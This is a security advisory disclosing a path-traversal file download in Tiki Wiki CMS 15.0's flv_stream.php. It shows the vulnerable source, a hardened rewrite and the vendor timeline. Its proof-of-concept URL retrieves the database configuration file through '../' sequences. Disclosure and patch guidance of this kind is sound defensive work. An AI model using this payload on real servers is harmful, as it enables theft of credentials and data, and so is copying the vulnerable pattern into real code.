
# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
# Date: 11-07-2016
# Software Link: https://tiki.org
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

The `flv_stream.php` script in the `vendor` directory builds a file path from the `file` GET parameter after passing it only through `htmlspecialchars()`, which does not remove `../` sequences, so any file readable by the web server can be downloaded.

http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html

File: tiki-15.0\vendor\player\flv\flv_stream.php

<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');

$position = $_GET['position'];
// Vulnerable line: htmlspecialchars() only encodes <, >, &, and quotes;
// it leaves "../" intact, so the path can escape the player directory.
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);

// file_exists() is the only check before the file is streamed back.
if (file_exists($filename)) {
    header('Content-Type: video/x-flv');
    if ($position != 0) {
        // FLV header is only prepended for non-zero offsets
        echo 'FLV', pack('CCNN', 1, 1, 9, 9);
    }
    $file = fopen($filename, "rb");
    fseek($file, $position);
    while (!feof($file)) {
        echo fread($file, 16384);
    }
    fclose($file);
} else {
    echo 'The file does not exist';
}
?>

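A hardened rewrite of the script above, added here as an illustration and not Tiki's actual 15.1 fix: it keeps the streaming logic but accepts only a bare `.flv` file name and verifies with `realpath()` that the resolved target stays inside the player directory. The `$allowedExt` whitelist and the 400/403/404 responses are my own choices.

```php
<?php
// Added example: hardened form of vendor/player/flv/flv_stream.php.
// Only files directly inside this directory, and only .flv files, are served.
$baseDir    = realpath(dirname(__FILE__));
$allowedExt = ['flv'];   // assumption: the player only ever needs .flv

$requested = isset($_GET['file']) ? (string) $_GET['file'] : '';
$position  = isset($_GET['position']) ? (int) $_GET['position'] : 0;

// Whitelist a plain file name instead of trying to "clean" the input
// (which is what htmlspecialchars() failed to do): no slashes, no
// backslashes, no NUL bytes, no dot-only names.
if ($requested === '' || strpbrk($requested, "/\\\0") !== false
    || $requested === '.' || $requested === '..') {
    http_response_code(400);
    exit('Invalid file name');
}
if (!in_array(strtolower(pathinfo($requested, PATHINFO_EXTENSION)), $allowedExt, true)) {
    http_response_code(403);
    exit('File type not allowed');
}

// realpath() resolves symlinks and normalises the path; the prefix check
// then guarantees the final target is still under $baseDir.
$filename = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
if ($filename === false || !is_file($filename)
    || strncmp($filename, $baseDir . DIRECTORY_SEPARATOR, strlen($baseDir) + 1) !== 0) {
    http_response_code(404);
    exit('The file does not exist');
}
if ($position < 0) {
    $position = 0;
}

session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');
header('Content-Type: video/x-flv');
if ($position != 0) {
    echo 'FLV', pack('CCNN', 1, 1, 9, 9);
}
$file = fopen($filename, 'rb');
fseek($file, $position);
while (!feof($file)) {
    echo fread($file, 16384);
}
fclose($file);
```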
2. Proof of Concept

Example for downloading the database configuration (with position=0 the script returns the raw file contents, without the FLV header prefix):

http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0

3. Solution

Update to version 15.1.

Timeline:

01-06-2016: Discovered
01-06-2016: Vendor notified
08-06-2016: Version 15.1 released, issue resolved